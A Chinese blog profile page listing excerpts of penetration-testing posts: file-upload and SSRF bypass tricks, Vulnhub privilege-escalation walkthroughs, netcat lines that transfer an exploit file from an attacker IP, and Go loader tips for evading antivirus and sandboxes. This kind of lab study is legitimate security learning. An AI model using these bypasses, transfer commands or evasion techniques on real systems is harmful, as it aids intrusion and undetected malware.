- 博客(24)
- 收藏
- 关注
原创 SSRF/文件上传详解
例如,如果验证是用 PHP 或 Java 等高级语言编写的,但服务器使用 C/C++ 中的较低级别函数处理文件,这可能会导致文件名末尾的末尾出现差异:exploit.asp;用户提供的文件上载到的目录可能具有更严格的控制。如果能找到一种方法将脚本上传到不应该包含用户提供的文件的其他目录,那么服务器终究可能会执行脚本 ../exploit.php在文件这里加一个../跳出当前目录。你提到的这些技术确实可以用来绕过某些基于白名单的输入过滤器,尤其是在 URL 解析和验证过程中存在不一致的情况下。
2024-12-20 11:41:18
1124
原创 Vulnhub--Solidstate 邮件服务渗透如何渗透
web页面主要就是看 cms 交互 目录端口服务去HackTricks查smtp一般都是 枚举用户名 弱口令 或者cms遇到交互差不能用vi或者vim的怎么办?sed echo重写文件cat tmp.py | sed 's/rm -r \/tmp\/\*/123/g' sed处理数据rbash的绕过还是要么ssh登陆时要么就是用里面的命令邮件服务器一定要看邮件POP 命令:用户 uid 以 “uid” 身份登录PASS 密码 用 “password” 代替您的实际密码。
2024-12-12 15:58:26
2192
原创 Vulnhub--FristiLeaks_1.3 脏牛提权
竞争条件是指多个进程或线程同时尝试访问和修改共享资源时,可能会导致不可预测的行为。在脏牛漏洞中,两个进程同时操作同一个内存页面,其中一个进程试图读取页面,而另一个进程试图写入页面,这种并发操作可能导致内核错误地处理内存页面的权限,使得只读页面变成可写。脏牛提权【条件竞争】适用版本没有思路了就要往图片里面挖一挖刚开始找exp浪费了太多时间。
2024-12-08 16:54:33
2216
原创 Vulnhub---kioptirx5 超详细wp
反弹shell有的多种上传:nc -lvnp 233 < 28718.c下载:nc 192.168.128.128 233 > 28718.c这个地方是查各种系统 apache的默认文件信息的。
2024-12-07 21:11:15
1163
原创 Vulnhub---kioptirx4 udf手工提权
UDF 是 "User-Defined Function"(用户定义函数)的缩写。它允许你在MySQL中创建自定义函数,这些函数可以像内置函数一样在SQL查询中使用。例如,你可以创建一个UDF来执行复杂的计算或处理特定的数据格式。UDF提权是一种利用MySQL UDF功能的漏洞,可以通过它在目标系统上执行任意命令,从而获得更高的权限。简单来说,就是通过MySQL数据库来执行操作系统级别的命令,进而控制整个服务器。
2024-12-07 00:05:08
891
原创 vulnhub kioptirx1.2 超详细wp
searchsploit LotusCMS -m 16982【漏洞id】 很方便的把searchsploit的exp直接复制到到当前目录uname -a查看机器信息dpkg -l 查看当前软件可以用grep 来过滤关键信息根据提示来确定解决办法export TERM=xterm-color 添加环境变量 命令行ssh -oHostKeyAlgorithms=ssh-rsa,ssh-dss dreg@192.168.128.134 修改我们客户端的ssh配置符合 服务端的密钥配置。
2024-12-05 20:40:06
990
原创 Kioptrix Level 1 靶机流程
按道理把提权脚本下载了后 重新执行exp就可以返回高权了 应该是环境问题最后也是用msf直接扫才有的高权,但是oscp是不能用msf的所以还是不算。searchsploit本地库搜exploit 路径/usr/share/exploitdb/exploitsexploit的提示在首页 usage requirements compile with都会讲清楚这个报错没有高亮使用信息都要看看。
2024-12-05 10:30:34
929
原创 红队快速打点必备
现在打的几次红队给的资产都是只给了企业的名字针对这种只给名字的第一步也就是 在企查查 天眼查 谷歌等找信息,所以enscan就解决了这种繁琐的事解决在HW/SRC场景下遇到的各种针对国内企业信息收集难题。
2024-11-21 10:58:49
440
原创 配置自己的gitee图床
最近在写笔记的时候出现了 笔记迁移到不同平台 图片不能传过去的问题研究了一下 发现用gitee平台当仓库 picgo 上传(图床)这样在typora上写的笔记随便复制到博客上或者csdn/或者其他平台上面,非常方便
2024-11-20 16:19:50
545
原创 go语言从0开始写免杀
隐藏黑窗口 import "github.com/gonutz/ide/w32"编译参数 go build -o main.exe -ldflags="-w -s" -trimpath main.go如果没有恶意代码360还是误杀, 加上导入_ "github.com/spf13/cobra"包。
2024-11-19 20:06:09
682
原创 go编写加载器绕过云沙箱
go build main.go // 当前编译的可执行文件在当前目录go build -o xxx.exe// 指定编译后的文件名称go run main.go // 编译的可执行文件放在%tmp%临时目录 , 下次编译会覆盖之前的 , 不会产生冗余。
2024-11-19 10:47:29
990
原创 shellcode的几个运行方式
void(*)()voidaddraddrvoid()()addraddrshellcode本身就会被存入内存 我们直接用VirtualProtect给内存 附加可执行权限上线成功。
2024-11-14 23:36:28
1025
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人